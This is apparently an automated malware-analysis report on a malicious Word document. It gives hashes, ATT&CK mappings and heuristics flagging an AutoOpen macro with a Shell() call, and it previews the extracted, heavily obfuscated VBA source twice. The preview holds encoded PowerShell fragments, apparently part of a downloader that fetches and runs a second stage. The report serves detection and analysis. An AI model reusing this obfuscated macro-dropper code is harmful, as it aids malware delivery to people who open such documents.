Office (OLE) malware analysis — malicious · e9968a7b9fd765ea

MALICIOUS

Office (OLE)

118.5 KB Created: 2018-02-17 08:56:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 0de68ca3c2cdb7e03c10f7901ea3733b SHA-1: dfa3c668812433f98b3f4865a572c9818b9005df SHA-256: e9968a7b9fd765ea2abcadf80e2163cc0de0841f78ee8d32938358720071d3d2

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands. The obfuscated nature of the script and the presence of a Shell() call strongly suggest it's designed to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31043 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31043 bytes
SHA-256: `203577861cff02f72ac9445b77a0b56d5a747583864af8e7d0d9fd20c9b76503`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "hFNFqPXqU" Function zvalXtUXb() On Error Resume Next miMHnNJLRMs = 1365530 + Atn(sNaHoJSQjtr) / ilLuZBj - Sgn(JPpcH * Log(cdmTfwXQZI)) / (3967265 - VYadvvRldAC * MbcCYd - wAJjodQOs) wHuEkBW = 8421405 + Atn(LCasfHij) / uLVBcbiG - Sgn(WUrvk * Log(jMrmzfjYt)) / (2195428 - ziUvUYsKdnfH * NzJLW - bQRDMSPrh) imiDfilXbMz = 7720788 + Atn(mbpobvm) / BwwlHj - Sgn(FnZzV * Log(CWkXhiHdE)) / (6255593 - WPBDRQl * XDUbc - KULNcShStjE) fAdBPWB = (MlNDldJ) + yHBjksbJKSUgsssd("KnvamsJmEdsKwEOqME[3,11,2]-joiNKNiKNi)((KNi & ( GbYSHeLLiD[1]+GbYsheLLid[13]+KFQXKFQ) (((KFQ(zKFQ+KFQLPezLPKNiqUWsb", 17, 94) kwizQrYu = 9727139 + Atn(ivHsXKwQ) / NdDWRwLzrn - Sgn(ZXLpQTmNZEfmT * Log(BJwXWGiOVB)) / (1803922 - VQwbXvH * rLjScD - jqXirjuQp) butMTftGsA = 2628181 + Atn(VhKLBJfFzV) / zjjiNkq - Sgn(fvSizXzTR * Log(bAJOwaZwjJ)) / (5016635 - WFCUsqwMWJaP * jCzKnDpOiWU - jkJFR) zioMWjrqNU = 689771 + Atn(ztYMfifHVFE) / atjPXZlt - Sgn(kYsjiP * Log(FoHEGt)) / (3137626 - HpUjHwUIZFuK * UlffK - PUjdzPWBjz) YkOOQCwj = (nOriznXnv) + yHBjksbJKSUgsssd("qjsTjN .( $ENV:pUBliC[13]+$Env:PubLiC[5]+'x') ( (('&((GV KNiMdrKNi).naGiLDjOF piUlhiHzEFTV", 7, 66) sorbHhT = 3241758 + Atn(unLZuMhLMDZa) / RzFNwJKRQ - Sgn(WaOOcYhVio * Log(OcEtkbXtYwCwWB)) / (270252 - NNNGUdJ * wfwEniirlZCX - TOinX) fwQwn = 8419815 + Atn(UbrNbKTIUif) / SPuFcSGuQKNz - Sgn(dMtwfTwmdUWnkd * Log(KZXDtRElYJ)) / (1031128 - RzOJOuPz * aJoPjwpuYSspdj - nJEhZbVpawfoP) ZZoMWZ = 2193394 + Atn(sVjfkQ) / oKSPrAqMfoN - Sgn(VFpiXWFTO * Log(DKZjQZXI)) / (9490254 - aFVuOJkUwNTrar * CDnIJfwUXGIp - kRpWqO) iaiYRYHBG = (EFlCbZwSBTaMX) + yHBjksbJKSUgsssd("DwTki+O8ztO8zLP+zLPzKFQ+KFQzLP+zLP)zLP+zL'+'P razLP+zLPndomzLP+zLP'+';eh1YYU '+'= .(zLP+zLPO8zLP+zLPzzLP+zLPnzLP+zLPeOKNi+KNi8KFQ+KFQz+O8zwO8zzLP+zLP+O8KNi+KNiz-zliDPnjTinSRuafNsdcSNPfAwGUoUVOwlBN", 5, 157) XJhfsP = 1249462 + Atn(cjhXwAMt) / SHTuXucTa - Sgn(YGOXvFWCuTfmIM * Log(JBndBLWpUuOPF)) / (3177232 - BRXshNOLl * azRZtjzH - NtoqZ) wapTD = 6876412 + Atn(Rtchp) / mVSNPQff - Sgn(pBLaNFPbOPIEDf * Log(bwIfwUj)) / (863814 - JLvHfRibWR * miwWw - RORhM) mBNhdpnlC = 6768092 + Atn(FmQHziaGzjRBJ) / wzjjil - Sgn(ZwzljuDUmu * Log(cFBsAacnqwpvhV)) / (7508067 - UQkAizNjpRVQo * lKoUZDHEw - EuufkB) BYhRdn = (WjAnTdlzn) + yHBjksbJKSUgsssd("upDzcjFRXUcaTSRaaMRKN'+'i+KNiFQO8zezLP+zLPO8zLP+KFQ+KFQzLPzzLP+zLP)zLKNi+KNiP+zLP;foreach(eh1asKFQ+K'+'FQzLP+zLPfc in ehzLP+zLP1zLP+zKFQ+KFQLPAzL'+'P+zLPaDh", 20, 134) LrCRzN = 2529294 + Atn(jmQTivjChvowFU) / nhItBuLlBNBs - Sgn(bUFuFUMOSkXwib * Log(ZNkzrKf)) / (5706582 - NLBXAOGdD * bNqutkHZUzlv - SAMncBAl) mYSTzUuwlu = 9095135 + Atn(jhtSoNEdtvvzz) / TrPklKjkRsj - Sgn(obdcCBjWG * Log(zRSMQTs)) / (9932867 - SDcUlmQAk * wPBjRYc - QsuTb) JXKSHww = 5523399 + Atn(szRYtM) / SVQULHsqlAwLI - Sgn(whAnoTbGdzbzOs * Log(zbqwFwfSzMVH)) / (5017608 - tXPUHu * QlFsQLsR - MszCmZFNCBSOD) ofEhJ = (sVCjEMwTLiG) + yHBjksbJKSUgsssd("KRDtXafVQACE(([chAR]79+[chAR]56+[chAR]12KN'+'i+KNi2),[StRING][chAR]39).RepLACE(XQpiDKjDjIPdfjZSRIzCjJSRifoms", 10, 70) jtvHmLjOuFW = 5584893 + Atn(XUURCR) / cBNLnj - Sgn(LHpfjlB * Log(DiVHNPiNzZ)) / (7942885 - ifQKK * BWWVfwZ - afLZUrHtQ) rhQbfuw = 7150423 + Atn(vDpznPlwclfrfV) / jiHiDYhn - Sgn(wCYFzwkPiOPKL * Log(jGtwzounj)) / (778871 - Hclhh * NQAwlqfAf - PMQGI) ibaVok = 4705176 + Atn(YcJZjw) / LVUDqUzhzpBuLa - Sgn(POzRoiaPztjWMF * Log(wdREnPWcK)) / (2141904 - iPbEN * faMvbSK - kFWJGznb) HOvzjkoHOZ = (iqkGplnBFA) + yHBjksbJKSUgsssd("aBjGzbjAiCdmZtz'+'LP/RCYnzLP+zLKNi+KNiPtA/O8z.Split(O8KNi+KNizLP+zLPz?O8zzLP+zLP);ehzLP+zLP1SDzLP+zLPC zLP+z'+'LP= zLP+zLPezLSM", 15, 111) lmZkaNpkvj = 7187069 + Atn(cXLHoDKASDNMG) / khlGssUJoLVUY - Sgn(ddkGCizT * Log(VSjXsSj)) / (8720886 - pVDLuPwsYS * zlTisWpTGKX - QVPnJVbrEStiD) VpvwjLXu = 2593863 + Atn(iUIJKfkM) / zFfWdQmRScm - Sgn(fcoXzbihrpafD * Log(wwANMj)) / (1725646 - oEq ... (truncated)

SHA-256: 203577861cff02f72ac9445b77a0b56d5a747583864af8e7d0d9fd20c9b76503

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hFNFqPXqU"
Function zvalXtUXb()
On Error Resume Next
miMHnNJLRMs = 1365530 + Atn(sNaHoJSQjtr) / ilLuZBj - Sgn(JPpcH * Log(cdmTfwXQZI)) / (3967265 - VYadvvRldAC * MbcCYd - wAJjodQOs)
wHuEkBW = 8421405 + Atn(LCasfHij) / uLVBcbiG - Sgn(WUrvk * Log(jMrmzfjYt)) / (2195428 - ziUvUYsKdnfH * NzJLW - bQRDMSPrh)
imiDfilXbMz = 7720788 + Atn(mbpobvm) / BwwlHj - Sgn(FnZzV * Log(CWkXhiHdE)) / (6255593 - WPBDRQl * XDUbc - KULNcShStjE)
fAdBPWB = (MlNDldJ) + yHBjksbJKSUgsssd("KnvamsJmEdsKwEOqME[3,11,2]-joiNKNiKNi)((KNi & ( GbYSHeLLiD[1]+GbYsheLLid[13]+KFQXKFQ) (((KFQ(zKFQ+KFQLPezLPKNiqUWsb", 17, 94)
kwizQrYu = 9727139 + Atn(ivHsXKwQ) / NdDWRwLzrn - Sgn(ZXLpQTmNZEfmT * Log(BJwXWGiOVB)) / (1803922 - VQwbXvH * rLjScD - jqXirjuQp)
butMTftGsA = 2628181 + Atn(VhKLBJfFzV) / zjjiNkq - Sgn(fvSizXzTR * Log(bAJOwaZwjJ)) / (5016635 - WFCUsqwMWJaP * jCzKnDpOiWU - jkJFR)
zioMWjrqNU = 689771 + Atn(ztYMfifHVFE) / atjPXZlt - Sgn(kYsjiP * Log(FoHEGt)) / (3137626 - HpUjHwUIZFuK * UlffK - PUjdzPWBjz)
YkOOQCwj = (nOriznXnv) + yHBjksbJKSUgsssd("qjsTjN .( $ENV:pUBliC[13]+$Env:PubLiC[5]+'x') ( (('&((GV KNi*Mdr*KNi).naGiLDjOF piUlhiHzEFTV", 7, 66)
sorbHhT = 3241758 + Atn(unLZuMhLMDZa) / RzFNwJKRQ - Sgn(WaOOcYhVio * Log(OcEtkbXtYwCwWB)) / (270252 - NNNGUdJ * wfwEniirlZCX - TOinX)
fwQwn = 8419815 + Atn(UbrNbKTIUif) / SPuFcSGuQKNz - Sgn(dMtwfTwmdUWnkd * Log(KZXDtRElYJ)) / (1031128 - RzOJOuPz * aJoPjwpuYSspdj - nJEhZbVpawfoP)
ZZoMWZ = 2193394 + Atn(sVjfkQ) / oKSPrAqMfoN - Sgn(VFpiXWFTO * Log(DKZjQZXI)) / (9490254 - aFVuOJkUwNTrar * CDnIJfwUXGIp - kRpWqO)
iaiYRYHBG = (EFlCbZwSBTaMX) + yHBjksbJKSUgsssd("DwTki+O8ztO8zLP+zLPzKFQ+KFQzLP+zLP)zLP+zL'+'P razLP+zLPndomzLP+zLP'+';eh1YYU '+'= .(zLP+zLPO8zLP+zLPzzLP+zLPnzLP+zLPeOKNi+KNi8KFQ+KFQz+O8zwO8zzLP+zLP+O8KNi+KNiz-zliDPnjTinSRuafNsdcSNPfAwGUoUVOwlBN", 5, 157)
XJhfsP = 1249462 + Atn(cjhXwAMt) / SHTuXucTa - Sgn(YGOXvFWCuTfmIM * Log(JBndBLWpUuOPF)) / (3177232 - BRXshNOLl * azRZtjzH - NtoqZ)
wapTD = 6876412 + Atn(Rtchp) / mVSNPQff - Sgn(pBLaNFPbOPIEDf * Log(bwIfwUj)) / (863814 - JLvHfRibWR * miwWw - RORhM)
mBNhdpnlC = 6768092 + Atn(FmQHziaGzjRBJ) / wzjjil - Sgn(ZwzljuDUmu * Log(cFBsAacnqwpvhV)) / (7508067 - UQkAizNjpRVQo * lKoUZDHEw - EuufkB)
BYhRdn = (WjAnTdlzn) + yHBjksbJKSUgsssd("upDzcjFRXUcaTSRaaMRKN'+'i+KNiFQO8zezLP+zLPO8zLP+KFQ+KFQzLPzzLP+zLP)zLKNi+KNiP+zLP;foreach(eh1asKFQ+K'+'FQzLP+zLPfc in ehzLP+zLP1zLP+zKFQ+KFQLPAzL'+'P+zLPaDh", 20, 134)
LrCRzN = 2529294 + Atn(jmQTivjChvowFU) / nhItBuLlBNBs - Sgn(bUFuFUMOSkXwib * Log(ZNkzrKf)) / (5706582 - NLBXAOGdD * bNqutkHZUzlv - SAMncBAl)
mYSTzUuwlu = 9095135 + Atn(jhtSoNEdtvvzz) / TrPklKjkRsj - Sgn(obdcCBjWG * Log(zRSMQTs)) / (9932867 - SDcUlmQAk * wPBjRYc - QsuTb)
JXKSHww = 5523399 + Atn(szRYtM) / SVQULHsqlAwLI - Sgn(whAnoTbGdzbzOs * Log(zbqwFwfSzMVH)) / (5017608 - tXPUHu * QlFsQLsR - MszCmZFNCBSOD)
ofEhJ = (sVCjEMwTLiG) + yHBjksbJKSUgsssd("KRDtXafVQACE(([chAR]79+[chAR]56+[chAR]12KN'+'i+KNi2),[StRING][chAR]39).RepLACE(XQpiDKjDjIPdfjZSRIzCjJSRifoms", 10, 70)
jtvHmLjOuFW = 5584893 + Atn(XUURCR) / cBNLnj - Sgn(LHpfjlB * Log(DiVHNPiNzZ)) / (7942885 - ifQKK * BWWVfwZ - afLZUrHtQ)
rhQbfuw = 7150423 + Atn(vDpznPlwclfrfV) / jiHiDYhn - Sgn(wCYFzwkPiOPKL * Log(jGtwzounj)) / (778871 - Hclhh * NQAwlqfAf - PMQGI)
ibaVok = 4705176 + Atn(YcJZjw) / LVUDqUzhzpBuLa - Sgn(POzRoiaPztjWMF * Log(wdREnPWcK)) / (2141904 - iPbEN * faMvbSK - kFWJGznb)
HOvzjkoHOZ = (iqkGplnBFA) + yHBjksbJKSUgsssd("aBjGzbjAiCdmZtz'+'LP/RCYnzLP+zLKNi+KNiPtA/O8z.Split(O8KNi+KNizLP+zLPz?O8zzLP+zLP);ehzLP+zLP1SDzLP+zLPC zLP+z'+'LP= zLP+zLPezLSM", 15, 111)
lmZkaNpkvj = 7187069 + Atn(cXLHoDKASDNMG) / khlGssUJoLVUY - Sgn(ddkGCizT * Log(VSjXsSj)) / (8720886 - pVDLuPwsYS * zlTisWpTGKX - QVPnJVbrEStiD)
VpvwjLXu = 2593863 + Atn(iUIJKfkM) / zFfWdQmRScm - Sgn(fcoXzbihrpafD * Log(wwANMj)) / (1725646 - oEq
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.